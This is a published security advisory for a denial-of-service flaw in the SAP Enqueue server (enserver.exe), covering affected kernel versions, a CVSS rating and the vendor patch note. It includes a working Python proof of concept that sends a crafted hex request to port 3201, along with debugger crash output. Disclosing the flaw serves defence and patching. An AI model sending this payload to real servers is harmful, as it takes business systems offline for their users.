[ERPSCAN-17-049] Denial of Service in Enqueue server
Application: SAP Enqueue
Versions Affected: 7490.17.26.5735
Vendor URL: SAP
Bug: DoS
Reported: 16.05.2017
Vendor response: 17.05.2017
Date of Public Advisory: 10.10.2017
Reference: SAP Security Note 2476937
Author: Vahagn Vardanyan (ERPScan)
VULNERABILITY INFORMATION
Class: Denial of Service
Risk: high priority
Remotely Exploitable: yes
Locally Exploitable: no
CVSS Information
CVSS v3 Base Score: 7.5 / 10
CVSS Base v3 Base Vector:
AV: Attack Vector (Related exploit range): Network (N)
AC: Attack Complexity (Required attack complexity): Low (L)
PR: Privileges Required (Level of privileges needed to exploit): None (N)
UI: User Interaction (Required user participation): None (N)
S: Scope (Change in scope due to impact caused to components beyond the vulnerable component): Unchanged (U)
C: Impact to Confidentiality: None (N)
I: Impact to Integrity: None (N)
A: Impact to Availability: High (H)
DESCRIPTION
An anonymous attacker can send a specially crafted request that crashes the enserver.exe process on the server.
BUSINESS RISK
A Denial of Service vulnerability can be used to terminate the process of a vulnerable component. While the process is down, nobody can use the service, which disrupts business processes, causes system downtime and damages business reputation.
VULNERABLE PACKAGES
SAP KERNEL 7.53 64-BIT
SAP KERNEL 7.52 64-BIT
SAP KERNEL 7.51 64-BIT
SAP KERNEL 7.50 64-BIT
SAP KERNEL 7.49 64-BIT
SAP KERNEL 7.45 64-BIT
SAP KERNEL 7.22 EXT 64-BIT
SAP KERNEL 7.22 64-BIT
SAP KERNEL 7.21 EXT 64-BIT
SAP KERNEL 7.21 EXT 32-BIT
SAP KERNEL 7.21 64-BIT
SAP KERNEL 7.21 32-BIT
SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2476937.
TECHNICAL DESCRIPTION
Proof of Concept
import socket

# Target host: placeholder, set to the address of the Enqueue server under test
SAP_SERVER = "SAP_SERVER"

# Hex-encoded Enqueue request that crashes enserver.exe (as published in this advisory)
PoC = "00000058abcde123000000000000005800000058060100000000000600000000000003e800000001000003e800000003707973617027732d6d6f6e69746f72000000e0b98000020000003b0000000500000003000000060000000400000001"

for i in range(1):
    try:
        sock = socket.socket()
        sock.connect((SAP_SERVER, 3201))   # Enqueue server port
        sock.send(bytes.fromhex(PoC))      # send the raw request bytes
        data = sock.recv(1024)
        sock.close()
    except Exception as ex:
        print(ex)

Debugger output at the crash: the byte read from [rbx+1] in EncOAMParamParse faults because rbx holds an invalid pointer.

0:007> r
rax=000000003c4c51a0 rbx=ffffffff8b0602d4 rcx=0000000000000000
rdx=000000003c4c51a0 rsi=000000007ffffe14 rdi=0000000000000002
rip=000000013fa18e82 rsp=00000000414ef2e0 rbp=00000000414ef328
 r8=000000003c4c51a0  r9=00000000414ef3d0 r10=000000013ff6b1e0
r11=0000000000000001 r12=0000000080000200 r13=000000000b0600a4
r14=0000000000000006 r15=0000000000000004
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
enserver!EncOAMParamParse+0x102:
00000001`3fa18e82 0fb64301        movzx   eax,byte ptr [rbx+1] ds:ffffffff`8b0602d5=??